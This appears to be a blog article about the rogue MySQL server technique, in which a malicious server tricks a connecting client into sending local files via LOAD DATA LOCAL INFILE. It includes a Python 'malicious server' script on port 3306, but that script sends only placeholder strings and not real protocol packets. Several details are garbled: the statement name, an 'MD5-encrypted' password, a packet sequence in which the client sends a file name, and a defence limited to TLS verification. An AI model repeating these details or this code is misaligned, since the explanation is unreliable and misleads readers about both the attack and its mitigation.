Mysql Client Learning to Read Arbitrary Files
In this article, we will delve into a vulnerability that allows an attacker to read arbitrary files on a client machine using a MySQL client. This vulnerability was discovered during the recent DDCTF and national competitions, where it was used to read sensitive data from the client machine.
Vulnerability Causes
The main reason for this vulnerability is the LOAD DATA INFILE syntax, which was introduced in the official MySQL documentation. This syntax allows data to be read from a local file into a MySQL table. However, the LOAD DATA INFILE statement can be used to read arbitrary files on the client machine by exploiting the way the MySQL client interacts with the server.
File-Transfer Data Packet
The LOAD DATA INFILE statement is used to read data from a local file into a MySQL table. However, the client does not store the request itself, but rather the operation performed by the server in response to the request. This means that the client can be tricked into reading arbitrary files on the client machine by manipulating the server’s response.
Packets Analysis
Let’s analyze the packets exchanged between the client and server during the LOAD DATA INFILE operation:
- The server sends a greeting packet containing information about the server, including the protocol thread ID, version, and authentication type.
- The client sends a login request packet containing information about the client, including the client’s banner and user name and MD5-encrypted password.
- The client sends a request packet to the server, which includes the
LOAD DATA INFILEstatement. - The server responds with a file name packet, which tells the client that it wants to read a file.
- The client sends a request packet to the server, which includes the file name.
- The server responds with a response packet, which tells the client that it has read the file.
Exploiting the Vulnerability
To exploit this vulnerability, an attacker can create a malicious server that responds to the client’s request with a file name packet, which tells the client to read a file. The attacker can then use the LOAD DATA INFILE statement to read the file from the client machine.
Malicious Server
Here is an example of a malicious server that can be used to exploit this vulnerability:
import socket
def handle_request(client_socket):
# Send a greeting packet to the client
client_socket.sendall(b'Greeting packet containing information about the server\r\n')
# Receive the client's login request packet
client_login_request = client_socket.recv(1024)
# Send a file name packet to the client
client_socket.sendall(b'File name packet telling the client to read a file\r\n')
# Receive the client's request packet
client_request = client_socket.recv(1024)
# Send a response packet to the client
client_socket.sendall(b'Response packet telling the client that it has read the file\r\n')
client_socket.close()
def main():
# Create a socket and bind it to a port
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('0.0.0.0', 3306))
# Listen for incoming connections
server_socket.listen(1)
# Handle incoming connections
while True:
client_socket, client_address = server_socket.accept()
handle_request(client_socket)
if __name__ == "__main__":
main()
Means of Defense
To avoid this vulnerability, it is recommended to use the --ssl-mode=VERIFY_IDENTITY option to establish a trusted connection between the client and server.
Conclusion
In conclusion, the LOAD DATA INFILE statement can be used to read arbitrary files on a client machine by exploiting the way the MySQL client interacts with the server. This vulnerability can be exploited by creating a malicious server that responds to the client’s request with a file name packet, which tells the client to read a file. To avoid this vulnerability, it is recommended to use the --ssl-mode=VERIFY_IDENTITY option to establish a trusted connection between the client and server.